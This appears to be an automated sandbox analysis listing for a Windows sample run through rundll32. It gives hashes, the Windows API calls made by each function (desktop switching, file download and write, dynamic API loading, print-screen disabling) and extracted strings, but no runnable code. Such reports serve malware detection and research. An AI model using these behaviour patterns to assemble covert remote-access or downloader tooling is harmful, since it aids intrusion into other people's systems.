                    • Opcode ID: 975694e8d6b8c61d7d57019746551ce0e5c907eb63c7b0c6c476cd4f6054937c
                    • Instruction ID: 87726c5e0741a9c224aaf74de48c6786e9d428115df9d6d2e2e1ae82c5f0335f
                    • Opcode Fuzzy Hash: 975694e8d6b8c61d7d57019746551ce0e5c907eb63c7b0c6c476cd4f6054937c
                    • Instruction Fuzzy Hash: AB619071808345ABF721DF60DC41FEB77E8BF95308F54482AE99D87142EB31E5188BA2
                    APIs
                    • GetModuleHandleA.KERNEL32(ntdll,RtlVerifyVersionInfo,00000000,?), ref: 6D03B42E
                    • GetProcAddress.KERNEL32(00000000), ref: 6D03B435
                    • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,?), ref: 6D03B501
                    • VerSetConditionMask.KERNEL32(00000000,?,00000001,?), ref: 6D03B50B
                    • VerSetConditionMask.KERNEL32(00000000,?,00000010,?,?,00000020,?,?,00000001,?), ref: 6D03B528
                    • VerSetConditionMask.KERNEL32(00000000,?,00000008,00000001,?,00000010,?,?,00000020,?,?,00000001,?), ref: 6D03B534
                    • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6D03B55C
                    • VerifyVersionInfoW.KERNEL32(?,00000004,00000000), ref: 6D03B5E9
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: ConditionMask$InfoVerifyVersion$AddressHandleModuleProc
                    • String ID: D?w$RtlVerifyVersionInfo$ntdll
                    • API String ID: 574519269-3637026075
                    • Opcode ID: 29dd799cc4abb3483ff540716a029c0493c1b0bcf69b4f117c88a45f1583a25e
                    • Instruction ID: 33d2d8954e4b6b80acc91585886d9e9ddcf2902488ea800cb2906a3176f22ef8
                    • Opcode Fuzzy Hash: 29dd799cc4abb3483ff540716a029c0493c1b0bcf69b4f117c88a45f1583a25e
                    • Instruction Fuzzy Hash: B0512771649362AFFB20DB25CC41FBF7BE8AB8A318F05441EF58897290C77594448BA3
                    APIs
                    • CertFreeCertificateContext.CRYPT32(?), ref: 6D020266
                    Strings
                    • schannel: failed to setup memory allocation, xrefs: 6D020087
                    • schannel: failed to setup replay detection, xrefs: 6D02005C
                    • schannel: failed to setup confidentiality, xrefs: 6D020070
                    • schannel: failed to store credential handle, xrefs: 6D0201B6
                    • schannel: failed to retrieve ALPN result, xrefs: 6D0200E8
                    • schannel: failed to retrieve remote cert context, xrefs: 6D020277
                    • schannel: failed to setup sequence detection, xrefs: 6D020048
                    • schannel: server selected an ALPN protocol too late, xrefs: 6D020131
                    • schannel: failed to setup stream orientation, xrefs: 6D02009E
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: CertCertificateContextFree
                    • String ID: schannel: failed to retrieve ALPN result$schannel: failed to retrieve remote cert context$schannel: failed to setup confidentiality$schannel: failed to setup memory allocation$schannel: failed to setup replay detection$schannel: failed to setup sequence detection$schannel: failed to setup stream orientation$schannel: failed to store credential handle$schannel: server selected an ALPN protocol too late
                    • API String ID: 3080675121-1264606989
                    • Opcode ID: 962c8111b921a541a59d1f800d490472fa55ce561909acce18f6ad858eca23ec
                    • Instruction ID: 405b598d17de05f7fe6ec8bd266b5c941e9ba9195144fc06715569e7fc86fe5c
                    • Opcode Fuzzy Hash: 962c8111b921a541a59d1f800d490472fa55ce561909acce18f6ad858eca23ec
                    • Instruction Fuzzy Hash: 8071C17050E302ABF311DB15DC91FAF7BE8AF49349F440418FA4897282E775E558CBA6
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: _memset$_strrchr
                    • String ID: D
                    • API String ID: 3722325190-2746444292
                    • Opcode ID: 89c303740c1add9219757045c392371c27dadc62f405e1885f2600a688bbd819
                    • Instruction ID: 9ffd79d0a074e5177fd7ad19b028055b8ea823c82cb4b673158efe917a0a51c1
                    • Opcode Fuzzy Hash: 89c303740c1add9219757045c392371c27dadc62f405e1885f2600a688bbd819
                    • Instruction Fuzzy Hash: 3C51D6B194031CABEB21DB64CC45FEA77789F54B09F4055C4E609AA1C0EB71B789CFA1
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: _strcspn$_strncpy
                    • String ID: %s: %s$Date$Host$X-%s-Date$host:%s$x-%s-date:%s
                    • API String ID: 4020253605-1552595612
                    • Opcode ID: 549c28877b7f1dcff608615e6a7e9955db4b182a8f0a4a8476d57dde9e1be406
                    • Instruction ID: 0fbfc00671bcdf4a0b5eaf555efcc5feabc436346f7be89ee41c6c0f7018a35b
                    • Opcode Fuzzy Hash: 549c28877b7f1dcff608615e6a7e9955db4b182a8f0a4a8476d57dde9e1be406
                    • Instruction Fuzzy Hash: 25D1E6719083579BF7118F249840BBB7BE5AF46308F064B6CED99DB242E731D909C7A2
                    APIs
                    • sendto.WS2_32(?,?,?,00000000,?,?), ref: 6D03024A
                    • WSAGetLastError.WS2_32(?,00000100,?,00000000,?,?), ref: 6D03025E
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLastsendto
                    • String ID: %I64d$%s%c%s%c$TFTP buffer too small for options$TFTP file name too long$blksize$timeout$tsize
                    • API String ID: 687199322-110720006
                    • Opcode ID: 8f94e05a7a9a5304bc68781dff0dce91267d077b6324010733e42c6b81649212
                    • Instruction ID: 32aafee5a4a01601aadfe932b90787fdc8757a324f2b086803307c4a398f93a5
                    • Opcode Fuzzy Hash: 8f94e05a7a9a5304bc68781dff0dce91267d077b6324010733e42c6b81649212
                    • Instruction Fuzzy Hash: A0C1F13510D3439FEB15CF25C890FFABBA6AF82308F19869CD5994B253D732A10ACB51
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: _memmove$Xinvalid_argumentstd::_
                    • String ID: invalid string position$string too long
                    • API String ID: 1771113911-4289949731
                    • Opcode ID: 5608126295b724294e8b5c6edee891695153fff7b9480306aa197bfe8f8601f0
                    • Instruction ID: 3372e999b56da08aa31f171a21e5e2499f898ccb9a805b5d150cb09037930e61
                    • Opcode Fuzzy Hash: 5608126295b724294e8b5c6edee891695153fff7b9480306aa197bfe8f8601f0
                    • Instruction Fuzzy Hash: D8511431700200ABEF08DB7DDDA59AF7666EBC03A9B146938E182C7785E535BD42C7C0
                    APIs
                    • _memset.LIBCMT ref: 04EC5F62
                    • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 04EC5F89
                    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 04EC5FC6
                    • CloseHandle.KERNEL32(00000000), ref: 04EC5FD1
                    • wsprintfA.USER32 ref: 04EC600D
                    • lstrcpyA.KERNEL32(00000000,?), ref: 04EC6026
                    • CreateThread.KERNEL32(00000000,00000000,Function_00015E80,00000000,00000000,00000000), ref: 04EC6067
                    • CloseHandle.KERNEL32(00000000), ref: 04EC606E
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: CloseCreateFileHandle$ThreadWrite_memsetlstrcpywsprintf
                    • String ID: %s %s
                    • API String ID: 3904585434-2939940506
                    • Opcode ID: ce6455ce480881c68ea156e5262194ac55ec08d75716e1317d554d14517071be
                    • Instruction ID: 610b6a1a35db26a853fc03b13801b501e462fdc5db8ff49f7e16b5d6b0c0b29c
                    • Opcode Fuzzy Hash: ce6455ce480881c68ea156e5262194ac55ec08d75716e1317d554d14517071be
                    • Instruction Fuzzy Hash: BF410572A00318ABDB359B74DC4AFEA7378FB44705F0402E8F509A6180DB747B46CB91
                    APIs
                    • _memset.LIBCMT ref: 04EC706E
                    • GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 04EC707C
                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 04EC70B2
                    • CloseHandle.KERNEL32(?), ref: 04EC70C8
                    • Sleep.KERNEL32(00000001), ref: 04EC70D0
                    • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 04EC70DC
                    • FreeLibrary.KERNEL32(00000000), ref: 04EC70F1
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: AddressProc$CloseFileFreeHandleLibrarySleepWrite_memset
                    • String ID: InternetCloseHandle$InternetReadFile
                    • API String ID: 586530251-535091292
                    • Opcode ID: 7a116f99f7403d4ef79378a6ef8ccebb73dad3a5298e264d57b8fc2b45728df4
                    • Instruction ID: a5a5b6bee23f3a8128b3eb18b4aa43ed2d8ae441dda724dcd8732a7c1abf996a
                    • Opcode Fuzzy Hash: 7a116f99f7403d4ef79378a6ef8ccebb73dad3a5298e264d57b8fc2b45728df4
                    • Instruction Fuzzy Hash: 4A1151F6540218ABDB20ABA0DD86FEEB37CEF84701F004198E705A6141CA786E468FA5
                    APIs
                    • LoadLibraryA.KERNEL32(user32.dll,1CA2304D), ref: 04EC35F5
                    • GetProcAddress.KERNEL32(00000000,OpenInputDesktop), ref: 04EC360C
                    • GetProcAddress.KERNEL32(00000000,OpenDesktopA), ref: 04EC3616
                    • GetProcAddress.KERNEL32(00000000,CloseDesktop), ref: 04EC361E
                      • Part of subcall function 04EC3370: LoadLibraryA.KERNEL32(user32.dll,1CA2304D), ref: 04EC33BA
                      • Part of subcall function 04EC3370: GetProcAddress.KERNEL32(00000000,GetThreadDesktop), ref: 04EC33D0
                      • Part of subcall function 04EC3370: GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 04EC33DE
                      • Part of subcall function 04EC3370: GetProcAddress.KERNEL32(00000000,SetThreadDesktop), ref: 04EC33EC
                      • Part of subcall function 04EC3370: GetProcAddress.KERNEL32(00000000,CloseDesktop), ref: 04EC33FA
                      • Part of subcall function 04EC3370: LoadLibraryA.KERNEL32(kernel32.dll), ref: 04EC3407
                      • Part of subcall function 04EC3370: GetProcAddress.KERNEL32(00000000,GetCurrentThreadId), ref: 04EC3417
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: AddressProc$LibraryLoad
                    • String ID: CloseDesktop$OpenDesktopA$OpenInputDesktop$user32.dll
                    • API String ID: 2238633743-3711086354
                    • Opcode ID: df7dc50acb751f6d909d0df68a5e7c3fe2d741b8cd4b174abaedadb736831b9f
                    • Instruction ID: ee713aea5084a918b4fccaf0b5a7656646ddf46909aa2471fd505497eee09302
                    • Opcode Fuzzy Hash: df7dc50acb751f6d909d0df68a5e7c3fe2d741b8cd4b174abaedadb736831b9f
                    • Instruction Fuzzy Hash: 6C119371A40218AFD710DFA9DD46BAFB7B8EB45A14F10413AE905A3340D7B878028AA5
                    APIs
                    • ?SetDisablePrintScreen@@YAXH@Z.HKEYBOARD(00000000,?), ref: 6D058737
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: DisablePrintScreen@@
                    • String ID:
                    • API String ID: 2435750010-0
                    • Opcode ID: a31bec7ccbe20cba7260c612af59e95310245d4699f5e179928670ea72206f20
                    • Instruction ID: 14e92bde5a67404c6cdabb022f0892fbddf7e66e878bc379ca0e094ec6124d1f
                    • Opcode Fuzzy Hash: a31bec7ccbe20cba7260c612af59e95310245d4699f5e179928670ea72206f20
                    • Instruction Fuzzy Hash: FFE16335E1422A8BDB25CF198E807EDBBB5BF59300F1481E9DD99A7300D671AED08F91
                    APIs
                    • _memset.LIBCMT ref: 04EE361C
                    • _strncpy.LIBCMT ref: 04EE3639
                      • Part of subcall function 04EE43F8: _memset.LIBCMT ref: 04EE4417
                      • Part of subcall function 04EE43F8: _memset.LIBCMT ref: 04EE4431
                      • Part of subcall function 04EE43F8: _memset.LIBCMT ref: 04EE447B
                    • _strncpy.LIBCMT ref: 04EE3684
                    • _strncpy.LIBCMT ref: 04EE374E
                    • _strncpy.LIBCMT ref: 04EE3765
                    • _strncpy.LIBCMT ref: 04EE37D9
                    • _strncpy.LIBCMT ref: 04EE3820
                    • _memset.LIBCMT ref: 04EE383D
                    • _strncpy.LIBCMT ref: 04EE3888
                      • Part of subcall function 04ED1058: std::_Xinvalid_argument.LIBCPMT ref: 04ED106E
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: _strncpy$_memset$Xinvalid_argumentstd::_
                    • String ID:
                    • API String ID: 3894514434-0
                    • Opcode ID: 1741034cf7b41852be961f9bdc50938c924f20bd8ca339661be4e5add2ae981d
                    • Instruction ID: 3a38c1b5b11c83679788870abeae74ebfa36781568e567a1a04aea191320578b
                    • Opcode Fuzzy Hash: 1741034cf7b41852be961f9bdc50938c924f20bd8ca339661be4e5add2ae981d
                    • Instruction Fuzzy Hash: C281EBB2D00224ABEB25EB65CC85BFD7778EF54304F4445D9EA09A7280DB30AB85CF95
                    APIs
                    • _memset.LIBCMT ref: 04EC6A20
                    • lstrcpyA.KERNEL32(?,?), ref: 04EC6A3F
                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 04EC6A6D
                    • CreateThread.KERNEL32(00000000,00000000,Function_00013690,Function_00014520,00000000,00000000), ref: 04EC6A8D
                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04EC6A9E
                    • CloseHandle.KERNEL32(?), ref: 04EC6AAB
                    • Sleep.KERNEL32(?), ref: 04EC6AB8
                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 04EC6ACB
                    • CloseHandle.KERNEL32(00000000), ref: 04EC6AD2
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: CloseCreateHandleObjectSingleWait$EventSleepThread_memsetlstrcpy
                    • String ID:
                    • API String ID: 1863454284-0
                    • Opcode ID: a7c521f0928cae44039250d507bf42fd0cc07af85be469143a81fb956fa5f7c6
                    • Instruction ID: 52aa1e6242259f9e54a8a4ad17d1cb56de78a05369f05e97b24f399517607f8f
                    • Opcode Fuzzy Hash: a7c521f0928cae44039250d507bf42fd0cc07af85be469143a81fb956fa5f7c6
                    • Instruction Fuzzy Hash: 2931E5B2A00318ABD724DBA4DC46BDA7778FB48711F0045A9F709A72C0CA746A41CBE4
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: htons
                    • String ID: .localhost$127.0.0.1$::1$Hostname %s was found in DNS cache$localhost
                    • API String ID: 4207154920-2796519411
                    • Opcode ID: 88c7a7f00708ff67fb2e92cf96c7cbcd6a41675bdaaa6324eee1bd67761225fc
                    • Instruction ID: 832d78ba1b6584d66cc1d7d2cddfcbcc268c7004bb30cca0a67598f82a086c8f
                    • Opcode Fuzzy Hash: 88c7a7f00708ff67fb2e92cf96c7cbcd6a41675bdaaa6324eee1bd67761225fc
                    • Instruction Fuzzy Hash: 8ED1EF7190C306AFF715CFA4DC40BAAB7E4AF65308F044A1DE8A857282E3719549CB93
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: __vfprintf_l
                    • String ID: %sAuthorization: NTLM %s$HTTP$NTLM$Proxy-$X
                    • API String ID: 86772892-3397526524
                    • Opcode ID: 0a9ebe31e00040227b9a11513155a18d16bab4520a6d0251c6f59741d072edd7
                    • Instruction ID: df480757f779fa1e55851f3978cd43ee5540674a66fca65d4281c4bbdc87e793
                    • Opcode Fuzzy Hash: 0a9ebe31e00040227b9a11513155a18d16bab4520a6d0251c6f59741d072edd7
                    • Instruction Fuzzy Hash: 01815EB59083519FEB01DF68C844B6BB7F4BF8A348F050929F988DB211E776D9148B93
                    APIs
                      • Part of subcall function 04EB29FE: _malloc.LIBCMT ref: 04EB2A18
                    • _memset.LIBCMT ref: 04EC6668
                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 04EC6759
                    • CreateThread.KERNEL32(00000000,00000000,Function_00013690,Function_00016200,00000000,00000000), ref: 04EC6779
                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04EC678A
                    • CloseHandle.KERNEL32(?), ref: 04EC6797
                    • CreateThread.KERNEL32(00000000,00000000,Function_00016200,00000000,00000000,00000000), ref: 04EC6845
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: Create$Thread$CloseEventHandleObjectSingleWait_malloc_memset
                    • String ID: yxxx
                    • API String ID: 3710809023-3567846162
                    • Opcode ID: 2e31aa0b2b40705f39008022a0e4fd7a246a66afe2fc46caebef11f7f17f9969
                    • Instruction ID: 5c4a76bba3f5d1a0e57463ac7c26ebe571fc286b2983550608279fcbec8d9e8b
                    • Opcode Fuzzy Hash: 2e31aa0b2b40705f39008022a0e4fd7a246a66afe2fc46caebef11f7f17f9969
                    • Instruction Fuzzy Hash: F6614D71E002189BDB24DF24DC81BDAB7B5EF48314F0441E9EA49AF381DA75BE85CB80
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLasthtonssend
                    • String ID: Sending data failed (%d)
                    • API String ID: 2027122571-2319402659
                    • Opcode ID: 178403bd3559c48cd7a199842cdea9cf53ad90abba196416a35f9f791b1af65a
                    • Instruction ID: 3fdd0ddcf6434cf8c3a563034e2acc6667a3b4cd8c1fb9523105ce791c3c757c
                    • Opcode Fuzzy Hash: 178403bd3559c48cd7a199842cdea9cf53ad90abba196416a35f9f791b1af65a
                    • Instruction Fuzzy Hash: 1F41F3705492428FE716CF38CC80EA97BB9FF89310F340659E956DB292D7309A11CBA2
                    APIs
                    • _ValidateLocalCookies.LIBCMT ref: 6D04C757
                    • ___except_validate_context_record.LIBVCRUNTIME ref: 6D04C75F
                    • _ValidateLocalCookies.LIBCMT ref: 6D04C7E8
                    • __IsNonwritableInCurrentImage.LIBCMT ref: 6D04C813
                    • ?SetDisablePrintScreen@@YAXH@Z.HKEYBOARD(?,00000001), ref: 6D04C82C
                    • _ValidateLocalCookies.LIBCMT ref: 6D04C868
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: CookiesLocalValidate$CurrentDisableImageNonwritablePrintScreen@@___except_validate_context_record
                    • String ID: csm
                    • API String ID: 980084377-1018135373
                    • Opcode ID: 0853e776c67212fc5359c2549198faa0f24b5601a8938910786ccb4252050c47
                    • Instruction ID: e8085695e886b3ce36eb2717b91676127993d8d1e6477f52ba46ae59e48e2bd1
                    • Opcode Fuzzy Hash: 0853e776c67212fc5359c2549198faa0f24b5601a8938910786ccb4252050c47
                    • Instruction Fuzzy Hash: 3E416234A04219EBDF00DF68C880FAE7BB5FF45328F15C169E919AB391D7319919CB94
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,?), ref: 04EC5370
                    • GetProcAddress.KERNEL32(00000000,IsBadReadPtr), ref: 04EC537F
                    • LoadLibraryA.KERNEL32(?), ref: 04EC53BE
                      • Part of subcall function 04EB359D: _malloc.LIBCMT ref: 04EB35AB
                    • GetProcAddress.KERNEL32(00000000,?), ref: 04EC542C
                    • FreeLibrary.KERNEL32(?), ref: 04EC5473
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: Library$AddressLoadProc$Free_malloc
                    • String ID: IsBadReadPtr$kernel32.dll
